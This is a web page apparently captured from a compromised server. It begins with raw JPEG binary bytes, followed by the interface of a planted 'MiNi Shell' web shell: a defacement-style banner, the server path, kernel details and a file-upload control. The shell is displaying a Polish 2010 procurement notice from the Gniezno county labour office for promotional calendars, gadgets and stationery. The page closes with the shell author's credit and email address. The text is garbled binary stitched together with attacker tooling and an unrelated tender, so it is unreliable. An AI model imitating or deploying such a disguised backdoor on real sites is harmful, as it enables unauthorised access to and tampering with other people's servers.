JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101116/369768-N-2010.html

<p class="kh_header"><b>Gniezno: Przedmiotem zamówienia  jest opracowanie projektów graficznych, wykonanie i dostawa materiałów promujących usługi Powiatowego Urzędu Pracy w Gnieźnie. 
Część I Wykonanie kalendarzy promujących usługi Powiatowego Urzędu Pracy w Gnieźnie
Części II Wykonanie gadżetów papierowych promujących usługi Powiatowego Urzędu Pracy w Gnieźnie 
Część III Wykonanie gadżetów promujących usługi Powiatowego Urzędu Pracy w Gnieźnie</b><br>
<b>Numer ogłoszenia: 369768 - 2010; data zamieszczenia: 16.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Sobieskiego 20, 62-200 Gniezno, woj. wielkopolskie, tel. 061 4261649, faks 061 4261162.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia  jest opracowanie projektów graficznych, wykonanie i dostawa materiałów promujących usługi Powiatowego Urzędu Pracy w Gnieźnie. 
Część I Wykonanie kalendarzy promujących usługi Powiatowego Urzędu Pracy w Gnieźnie
Części II Wykonanie gadżetów papierowych promujących usługi Powiatowego Urzędu Pracy w Gnieźnie 
Część III Wykonanie gadżetów promujących usługi Powiatowego Urzędu Pracy w Gnieźnie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Warunki ogólne dotyczące każdej części. 
Przedmiotem zamówienia jest opracowanie projektów graficznych, wykonanie i dostawa materiałów promujących usługi  Powiatowego Urzędu Pracy w Gnieźnie. Szczegółowy opis przedmiotu zamówienia wraz z podziałem na części znajduje się w załączniku nr 5 do SIWZ. 
Wszystkie materiały promocyjne będące przedmiotem niniejszego postępowania muszą posiadać wszelkie wymagane prawem atesty i świadectwa dopuszczające je do obrotu na terytorium Rzeczpospolitej Polskiej.
Wybrany w niniejszym postępowaniu Wykonawca w ciągu 5 dni od daty zawarcia umowy zobowiązany będzie do dostarczenia  Zamawiającemu projektów graficznych dla materiałów promocyjnych tzn. np. umieszczenia wymaganych oznaczeń (logo), nadruków, kolorów, opracowania zawartości i wyglądu kalendarzy, itp. zgodnie z opisem przedmiotu zamówienia.
Projekty graficzne powinny być przygotowane w programie Corel, Adobe Fhoto Shop,  lub 
w formacie pdf albo jpg, przesłane pocztą elektroniczną na adres mailowy wskazany przez Zamawiającego, w przypadku braku możliwości dostarczenia projektów graficznych 
w niniejszych programach lub formacie Wykonawca zobowiązany będzie do samodzielnego dostarczenia do siedziby Zamawiającego projektów graficznych. 
Zamawiający akceptuje projekt lub może zgłaszać poprawki do przedstawionych przez Wykonawcę projektów graficznych do momentu ich ostatecznej akceptacji. Wykonawca zobowiązany będzie wprowadzać zgłoszone przez Zamawiającego uwagi do projektów graficznych i przekazać poprawione projekty  nie później niż w terminie 3 dni od dnia zgłoszenia uwag przez Zamawiającego. W przypadku niedotrzymania przez Wykonawcę tego terminu, Zamawiający ma prawo odstąpić od umowy w trybie art. 492 KC w związku z art. 139 pzp. 

Sposób dostawy 
Wykonawca zobowiązany będzie do dostarczenia wszystkich materiałów promocyjnych 
w ciągu 14 dni licząc od dnia akceptacji przez Zamawiającego ostatecznego wyglądu wszystkich materiałów promocyjnych (projektów graficznych). W przypadku niedotrzymania przez Wykonawcę tego terminu, Zamawiający ma prawo odstąpić od umowy w trybie art. 492 KC w związku z art. 139 pzp. 
Wykonawca zapewni transport, rozładowanie i wniesienie zamówionych materiałów promocyjnych do Powiatowego Urzędu Pracy w Gnieźnie, który mieści się 
w budynku położonym przy ul. Sobieskiego 20, w miejsce wskazane przez Zamawiającego.  Dostarczone materiały promocyjne muszą być spakowane w taki sposób, aby nie uległy zniszczeniu podczas transportu, rozładunku i  wniesienia. Wykonawca zobowiązany będzie do przeliczenia i dostarczenia w stanie nienaruszonym nowych, nieużywanych materiałów promocyjnych w opakowaniach opisanych nazwą materiału promocyjnego, jego zdjęciem 
a także ilością sztuk w środku.  W przypadku stwierdzenia wadliwości dostarczonych materiałach promocyjnych lub ich niezgodności z opisem przedmiotu zamówienia Zamawiający zastrzega sobie prawo odmowy ich odbioru. 
Wykonawca przyjmuje pełną odpowiedzialność za wszelkie uszkodzenia powstałe 
w dostarczonych wyrobach podczas ich transportu do siedziby Zamawiającego i zobowiązany jest wymienić uszkodzone wyroby na nowe w terminie 5 dni roboczych od dnia planowanej dostawy.
Wykonawca wraz z dostawą materiałów promocyjnych przekaże Zamawiającemu wszystkie projekty graficzne zgrane na płytę CD w formie umożliwiającej edycję, które po zrealizowaniu umowy staną się własnością Zamawiającego wraz z prawami autorskimi do nich bez dodatkowych opłat. 
Wykonawca zobowiązany jest do uzgodnienia z Zamawiającym terminu dostawy materiałów promocyjnych z wyprzedzeniem co najmniej 3 dniowym.
Zamawiający bez jakichkolwiek roszczeń finansowych ze strony Wykonawcy z tym związanych może odmówić przyjęcia dostawy w całości lub części jeżeli:
- termin dostawy nie był z nim uprzednio uzgodniony,
- którykolwiek z wyrobów, będących przedmiotem niniejszej umowy nie będzie fabrycznie nowy, wolny od wad fizycznych wykonany zgodnie z wymaganiami techniczno - ilościowymi określonymi w opisie przedmiotu zamówienia,
- materiały promocyjne zapakowane będą w inny sposób, niż określone w specyfikacji istotnych warunków zamówienia,
- dostawa będzie niepełna tzn. np. gdy Wykonawca nie dołączy wszystkich projektów graficznych zgodnie z wymaganiami Zamawiającego lub wszystkich uzgodnionych materiałów promocyjnych,
- pracownicy Wykonawcy odmówią rozładunku i złożenia dostarczonych wyrobów, 
w Powiatowym Urzędzie Pracy w Gnieźnie w miejscu wskazanym przez Zamawiającego. 
Dostawa potwierdzona będzie protokołem odbioru podpisanym przez strony. 
Gwarancja
Wykonawca zobowiązany będzie do udzielenia 12 miesięcznej gwarancji na wszystkie materiały promocyjne. Okres gwarancji liczony będzie od dnia dostarczenia materiałów promocyjnych do Powiatowego Urzędu Pracy w Gnieźnie i podpisana protokołu odbioru.
Niezależnie od uprawnień z tytułu gwarancji, Zamawiającemu przysługują uprawnienia 
z tytułu rękojmi za wady, zgodnie z przepisami Kodeksu cywilnego.
Wykonawca zobowiązany będzie w ramach gwarancji i rękojmi do usuwania wszelkich ujawnionych wad w terminie 7 dni od daty ich zgłoszenia telefoniczne, faksem lub drogą mailową o zaistniałej sytuacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie niezbędnej wiedzy i doświadczenia Wykonawcy muszą wykazać, że w czasie określonym w pkt. VII SIWZ ppkt 1.2a i niejszym ogłoszeniu o zamówieniu w pkt III.4 wykonywali: 
Część I dwie usługi o wartości łącznej usług minimum 15 000,00 zł i zakresem związanych  z reklamą (np. wykonanie kalendarzy).
Część II trzy usługi o wartości łącznej usług minimum 29 000,00 zł i zakresem związanych  z reklamą (np. wykonanie teczek tekturowych, karteczek samoprzylepnych).
Część III cztery usługi o wartości łącznej usług minimum 50 000,00 zł i zakresem związanych  z reklamą ( np. wykonanie gadżetów reklamowych). 
Do wykazu należy dołączyć dokumenty potwierdzające należyte wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji wykonawcy, a jeżeli wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo, określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania wykonawcy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Jakość, estetyka wykonania - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupgniezno.bip.net.pl; www.pup-gniezno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Gnieźnie
ul. Sobieskiego 20
62-200 Gniezno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.11.2010 godzina 14:00, miejsce: Powiatowy Urząd Pracy w Gnieźnie
ul. Sobieskiego 20
62-200 Gniezno
Biuro podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie kalendarzy promujących usługi Powiatowego Urzędu Pracy w Gnieźnie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I obejmuje:
kalendarz książkowy 2011 - 300 szt.
kalendarz trójdzielny 2011 - 100 szt.
wkład kalendarzowy na biurko - 100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość, estetyka wykonania - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie gadżetów papierowych promujących usługi Powiatowego Urzędu Pracy w Gnieźnie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II obejmuje:
karteczki samoprzylepne z logo - 500 bloczków
teczki tekturowe - 5000 szt.
torba papierowa duża  - 1000 szt.
torby papierowe  średnie - 1000 szt.
kieszonka tekturowa na ulotki A-6 - 500 szt.
tekturowe zaproszenie - 2000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość, esteyka wykonania - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie gadżetów promujących usługi Powiatowego Urzędu Pracy w Gnieźnie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III obejmuje:
parasol uniwersalny - 100 szt.
smycz materiałowa - 1000 szt.
długopis plastikowy - 5000 szt.
brelok na klucze - 200 szt.
długopis metalowy - 200 szt.
długopis w etui - 200 szt.
pendrive - 50 szt.
teczka z ekoskóry  - 50 szt.
zegar ścienny - 50 szt.
zegar z przybornikiem - 50 szt.
wizytowniki - 25 szt.
aluminiowe stojaki na ulotki - 5 szt.
składana ścianka ekspozycyjna  - 1 szt.
stojaczek akrylowy L-poziomy A-5 - 100 szt.
prezenter rolkowy - 3 szt.
obrotowy stojaczek na ulotki - 2 szt.
zestaw karteczek samoprzylepnych z długopisem - 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość, estetyka wykonania - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com